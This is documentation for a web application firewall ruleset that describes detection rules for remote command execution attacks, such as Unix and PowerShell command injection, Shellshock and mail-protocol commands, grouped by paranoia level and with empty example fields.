Core Ruleset: 932xxx
Rules with the 931xxx prefix protect web applications from command injection attacks.
Paranoia Level 1 (default)
Rule: 932100
This is compound rule (101, 105, 106) based on paranoia level and will protect the web server and prevent the request from including anything that appears as a unix command. This ensures that weak applications cannot be tricked into executing unix commands directly.
This rule matches against incoming cookies, parameters and URL strings.
Message: Remote Command Execution: Unix Command Injection
Example:
Rule: 932120
Protects against commonly used PowerShell commands, cmdlets and options which can be exploited to grant an attacker elevated access to a system.
Message: Remote Command Execution: Windows PowerShell Command Found
Example:
Rule: 932130
Protects against common command expressions used by Unix systems.
Applies: Cookies, cookie names, parameters and parameter names
Message: Remote Command Execution: Unix Shell Expression Found
Example:
Rule: 932140
Protects against FOR
, IF
commands for Windows systems.
Message: Remote Command Execution: Windows FOR/IF Command Found
Example:
Rule: 932160
Prevents common unix command sequences.
Message: Remote Command Execution: Unix Shell Code Found
Example:
Rule: 932170
Detects and prevents exploitation of the “Shellshock” GNU Bash RCE vulnerability.
Click here for more information on the Shellshock exploit
Message: Remote Command Execution: Shellshock (CVE-2014-6271)
Example:
Rule: 932180
Prevents uploading of suspicious files, this protects from attackers using a file upload form to upload configuration files or other files that might change the behaviour of the web server possibly causing remote code execution.
Message: Restricted File Upload Attempt
Example:
Rule: 932330
Detects attempts made to traverse unix shell history and invoke previously issued commands. This command has a stricter rule set which matches on more fields of the request when running at paranoia level 3.
Message: Remote Command Execution: Unix shell history invocation
Example:
Paranoia Level 2
Rule: 932200
Blocks RCE bypass using various techniques including; unititialised variables, string concatenations and globbing patterns.
Message: RCE Bypass Technique
Example:
Rule: 932210
Prevent SQLite CLI commands from being sent to the server.
Message: RCE Bypass Technique
Example:
Rule: 932300
Prevent SMTP command execution based on the RFCs for the SMTP protocol. List of SMTP commands: from rfc 5321 (https://www.rfc-editor.org/rfc/rfc5321)
Message: Remote Command Execution: SMTP Command Execution
Example:
Rule: 932310
Prevent IMAP4 command execution based on the RFCs for the IMAP4 protocol. List of IMAP4 commands: from rfc 3501 (https://datatracker.ietf.org/doc/html/rfc3501#section-9)
Message: Remote Command Execution: IMAP Command Execution
Example:
Rule: 932320
Prevent POP3 command execution based on the RFCs for the POP3 protocol. List of POP3 commands: from rfc rfc1939 (https://www.rfc-editor.org/rfc/rfc1939#appendix-B)
Message: Remote Command Execution: POP3 Command Execution
Example:
Paranoia Level 3
This module does not define checks for paranoia level 3.
Paranoia Level 4
This module does not define checks for paranoia level 4.